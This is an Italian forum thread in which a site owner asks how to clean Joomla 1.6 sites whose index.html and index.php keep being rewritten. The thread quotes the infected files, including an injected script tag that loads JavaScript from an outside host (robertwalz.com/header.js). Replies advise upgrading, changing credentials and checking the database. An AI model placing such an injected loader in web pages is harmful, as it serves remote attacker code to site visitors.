Visualizzazione risultati 1 fino 8 di 8

Discussione: Sito Web Infetto

  1. #1
    Guest

    Exclamation Sito Web Infetto

    Salve, qualcuno saprebbe dirmi come disinfettare un webspace infettato da questo virus? ho notato che si ostina a modificare i codici dei files index.html e index.php. I siti in questione sono QUESTO e QUESTO. Entrambi si basano sulla piattaforma Joomla 1.6
    Di seguito vi posto i files incriminati, in modo da farvi capire...

    index.html
    Codice:
    <html>
    <body><script type="text/javascript" src="http://robertwalz.com/header.js"></script>
    </body>
    </html>
    ecco la parte incriminata
    Codice:
    <script type="text/javascript" src="http://robertwalz.com/header.js"></script>
    index.php
    Codice:
    <?php
    /**
    * @package        Joomla.Site
    * @copyright    Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
    * @license        GNU General Public License version 2 or later; see LICENSE.txt
    */
    
    // Set flag that this is a parent file.
    define('_JEXEC', 1);
    define('DS', DIRECTORY_SEPARATOR);
    
    if (file_exists(dirname(__FILE__) . '/defines.php')) {
        include_once dirname(__FILE__) . '/defines.php';
    }
    
    if (!defined('_JDEFINES')) {
        define('JPATH_BASE', dirname(__FILE__));
        require_once JPATH_BASE.'/includes/defines.php';
    }
    
    require_once JPATH_BASE.'/includes/framework.php';
    
    // Mark afterLoad in the profiler.
    JDEBUG ? $_PROFILER->mark('afterLoad') : null;
    
    // Instantiate the application.
    $app = JFactory::getApplication('site');
    
    // Initialise the application.
    $app->initialise();
    
    // Mark afterIntialise in the profiler.
    JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
    
    // Route the application.
    $app->route();
    
    // Mark afterRoute in the profiler.
    JDEBUG ? $_PROFILER->mark('afterRoute') : null;
    
    // Dispatch the application.
    $app->dispatch();
    
    // Mark afterDispatch in the profiler.
    JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
    
    // Render the application.
    $app->render();
    
    // Mark afterRender in the profiler.
    JDEBUG ? $_PROFILER->mark('afterRender') : null;
    
    // Return the response.
    echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script></body></html>
    ed ecco la parte incriminata!!!
    Codice:
    // Return the response.
    echo $app;<html><body><script type="text/javascript"  src="http://robertwalz.com/header.js"></script></body></html>
    Qualcuno sa fornirmi assistenza?! Grazie!! :)

    EDIT:
    Ho provato a scaricare tutti i files sul mio pc e li ho analizzati con NOD32. Nessun risultato riscontrato!
    Ultima modifica di fantamici : 20-02-2012 alle ore 02.57.29 Motivo: Puntualizzazione

  2. #2
    L'avatar di dapeco
    dapeco non è connesso Community Manager
    Data registrazione
    21-10-2003
    Residenza
    Brusasco (To)
    Messaggi
    4,909

    Predefinito

    joompla 1.6 è molto "vecchio", dovresti aggiornarlo almeno alle 1.7 (dopo aver bonificato le pagine). Probabilmente è lì il buco sfruttato per inserire quel codice malevolo. Cambia anche le credenziali di accesso ai tuoi account.
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...

    ASD Brusasco - C'è altro sport oltre al calcio!

    "Io sono vivo, voi siete morti" (Philip Dick, Ubik)

  3. #3
    Guest

    Predefinito

    Citazione Originalmente inviato da dapeco Visualizza messaggio
    joompla 1.6 è molto "vecchio", dovresti aggiornarlo almeno alle 1.7 (dopo aver bonificato le pagine). Probabilmente è lì il buco sfruttato per inserire quel codice malevolo. Cambia anche le credenziali di accesso ai tuoi account.
    Ho già cambiato le credenziali di accesso e cancellato il codice da molti files ma non capisco perchè il problema continua a ripresentarsi! Come posso "bonificare" del tutto le pagine? C'è qualche programma che può svolgere questa funzione? Ci tengo a specificare che ho già rimosso tutti i files da uno dei siti, reinstallato il tutto ma nonostante ciò il problema si ripresenta :(

  4. #4
    L'avatar di dapeco
    dapeco non è connesso Community Manager
    Data registrazione
    21-10-2003
    Residenza
    Brusasco (To)
    Messaggi
    4,909

    Predefinito

    Il problema è che probabilmente quella versione di joomla è compromessa, quindi la cosa importante da fare è aggiornare, ma per farlo è meglio avere le pagine pulite.

    Non conosco software che possano bonificarti le pagine con 1 click purtroppo.
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...

    ASD Brusasco - C'è altro sport oltre al calcio!

    "Io sono vivo, voi siete morti" (Philip Dick, Ubik)

  5. #5
    Guest

    Predefinito

    Capito! Secondo te, visto il problema, ci sarà uno script che effettua queste modifiche alle pagine? E, se si, dove potrebbe nascondersi? Ho notato che vengono ri-modificate tutte contemporaneamente...quindi mi sa che stiamo parlando di un sistema automatizzato...

  6. #6
    L'avatar di dapeco
    dapeco non è connesso Community Manager
    Data registrazione
    21-10-2003
    Residenza
    Brusasco (To)
    Messaggi
    4,909

    Predefinito

    Purtroppo non saprei, ovviamente presuppongo che tu abbia solo joomla installato sull'account e non altri eventuali applicativi.
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...

    ASD Brusasco - C'è altro sport oltre al calcio!

    "Io sono vivo, voi siete morti" (Philip Dick, Ubik)

  7. #7
    Guest

    Predefinito

    Citazione Originalmente inviato da dapeco Visualizza messaggio
    Purtroppo non saprei, ovviamente presuppongo che tu abbia solo joomla installato sull'account e non altri eventuali applicativi.
    Si, soltanto Joomla! :(

  8. #8
    Guest

    Predefinito

    Ciao, provo a darti un'ulteriore idea su dove guardare.
    Il codice malevolo potrebbe nascondersi in qualche componente .php modificato dal virus di joomla o qualche javascrip nascostosi tra i files del tuo spazio su server, ma forse potrebbe anche nascondersi nel contenuto degli articoli, che joomla salva su DB Mysql.

    Quindi all'apertura della home page, non appena viene visualizzata una pagina, il codice viene eseguito.

    Dovresti fare un dump dell'intero DB su flat file e controllare il contenuto delle tabelle.
    Non so se esistano tools per controllare/bonificare i dati su Mysql. Dovrei cercare in rete.
    I più incriminati sono i campi testo e memo.

    Non saprei in quali altri altri posti dove cercare.

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •